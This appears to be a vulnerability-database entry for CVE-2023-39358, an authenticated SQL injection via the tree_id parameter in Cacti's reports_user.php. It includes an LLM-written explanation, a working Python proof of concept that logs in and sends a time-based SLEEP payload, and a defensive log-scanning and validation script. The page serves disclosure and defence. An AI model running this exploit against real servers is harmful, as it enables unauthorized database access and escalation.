VYPR
Unrated severity · NVD Advisory · Published Sep 5, 2023 · Updated Feb 13, 2025

Authenticated SQL injection vulnerability in reports_user.php in Cacti

CVE-2023-39358

Description

Cacti is an open source operational monitoring and fault management framework. An authenticated SQL injection vulnerability was discovered which allows authenticated users to perform privilege escalation and remote code execution. The vulnerability resides in the reports_user.php file. In ajax_get_branches, the tree_id parameter is passed to the reports_get_branch_select function without any validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability mechanics

Root cause

"The `tree_id` parameter is passed to the `reports_get_branch_select` function without validation, leading to SQL injection."

Attack vector

An authenticated user can exploit this vulnerability by sending a crafted `tree_id` parameter to the `ajax_get_branches` action in `reports_user.php`. The `tree_id` is directly incorporated into an SQL query's WHERE clause when its value is greater than 0. This allows an attacker to inject malicious SQL code, such as a `SLEEP` command to confirm the vulnerability, as demonstrated by the provided Python PoC [ref_id=1].

Affected code

The vulnerability resides in the `reports_user.php` file, specifically within the `ajax_get_branches` case. The `tree_id` parameter is passed to the `reports_get_branch_select` function without sanitization. The `reports_get_branch_select` function then uses this unvalidated `tree_id` in a SQL query's WHERE clause [ref_id=1].

What the fix does

The advisory indicates that the vulnerability is addressed in version 1.2.25 and later. The fix involves properly validating the `tree_id` parameter before it is used in the SQL query. This prevents the injection of arbitrary SQL code, thereby mitigating the risk of privilege escalation and remote code execution.

Preconditions

  • auth: The attacker must be an authenticated user.

Reproduction

By running the following Python3 code, you will observe a delay of 10 seconds in the response, which indicates the occurrence of SQL injection.

```python
import argparse
import requests
import sys
import urllib3

#import os
#os.environ['http_proxy'] = 'http://localhost:8080'

# Time-based probe: the injected SLEEP delays the response by sleep_time seconds
sleep_time = 10
payload = f"1));SELECT SLEEP({sleep_time})-- -"

def get_csrf_token():
    # Read the csrfMagic token from the login page; the login POST requires it
    url = f"{target}/index.php"
    res_body = session.get(url).content.decode()
    csrf_token = res_body.split('var csrfMagicToken = "')[1].split('"')[0]
    if not csrf_token:
        print("[-] Unable to find csrf_token")
        sys.exit()
    return csrf_token

def login(username, password):
    # Authenticate first; the vulnerable action is only reachable with a valid session
    login_url = f"{target}/index.php"

    csrf_token = get_csrf_token()
    data = {'action': 'login', 'login_username': username, 'login_password': password, '__csrf_magic': csrf_token}
    res_body = session.post(login_url, data=data).content.decode()
    if 'You are now logged into <' in res_body:
        print('[+] Login successful!')
    else:
        print('[-] Login failed. Check your credentials')
        sys.exit()

def exploit():
    # Send the payload as the tree_id parameter of the ajax_get_branches action
    url = f"{target}/reports_user.php"

    params = {
        'action': 'ajax_get_branches',
        'tree_id': payload
    }

    print('[+] Sending payload...')
    print(f"[+] Payload: {payload}")
    session.get(url, params=params)

if __name__ == '__main__':
    urllib3.disable_warnings()
    parser = argparse.ArgumentParser(description="Cacti 1.2.24 - reports_user.php 'tree_id' SQL Injection (authenticated)")
    parser.add_argument('-t', '--target', help='', required=True)
    parser.add_argument('-u', '--username', help='', required=True)
    parser.add_argument('-p', '--password', help='', required=True)
    args = parser.parse_args()
    username = args.username
    password = args.password
    target = args.target
    # target and session are module-level globals used by the functions above
    session = requests.Session()

    login(username, password)
    exploit()
```

[ref_id=1]
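As an added example (not from the advisory or the Cacti project), the integer check that "What the fix does" implies, applied both as the input validation the vulnerable action lacked and as a detection run over constructed access-log lines that include the PoC's SLEEP probe above. The log format, the regex, and the exact shape of the check (a bare whole number) are assumptions; the advisory only says that `tree_id` is validated.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic): one benign request,
# one carrying the advisory's SLEEP probe (URL-encoded), one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2023:10:00:01 +0000] "GET /cacti/reports_user.php?action=ajax_get_branches&tree_id=3 HTTP/1.1" 200 512
10.0.0.9 - - [05/Sep/2023:10:00:07 +0000] "GET /cacti/reports_user.php?action=ajax_get_branches&tree_id=1%29%29%3BSELECT+SLEEP%2810%29--+- HTTP/1.1" 200 88
10.0.0.5 - - [05/Sep/2023:10:00:09 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 2048
"""

# Assumed Apache/nginx combined-format request line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def is_valid_tree_id(value):
    """Whole-number check (assumed shape of the fix): tree_id must be a bare
    non-negative integer, so quotes, parentheses and SQL keywords never reach
    the WHERE clause that reports_get_branch_select builds."""
    return value is not None and value.isdigit()

def flag_requests(log_text):
    """Return (client_ip, raw_tree_id) for every ajax_get_branches request to
    reports_user.php whose tree_id would fail the integer check."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('path'))
        if not parts.path.endswith('/reports_user.php'):
            continue
        qs = parse_qs(parts.query)  # decodes %xx and '+' like the server would
        if qs.get('action', [''])[0] != 'ajax_get_branches':
            continue
        tree_id = qs.get('tree_id', [None])[0]
        if not is_valid_tree_id(tree_id):
            findings.append((m.group('ip'), tree_id))
    return findings

if __name__ == '__main__':
    for ip, raw in flag_requests(SAMPLE_LOG):
        print(f"suspicious tree_id from {ip}: {raw!r}")
```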

Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
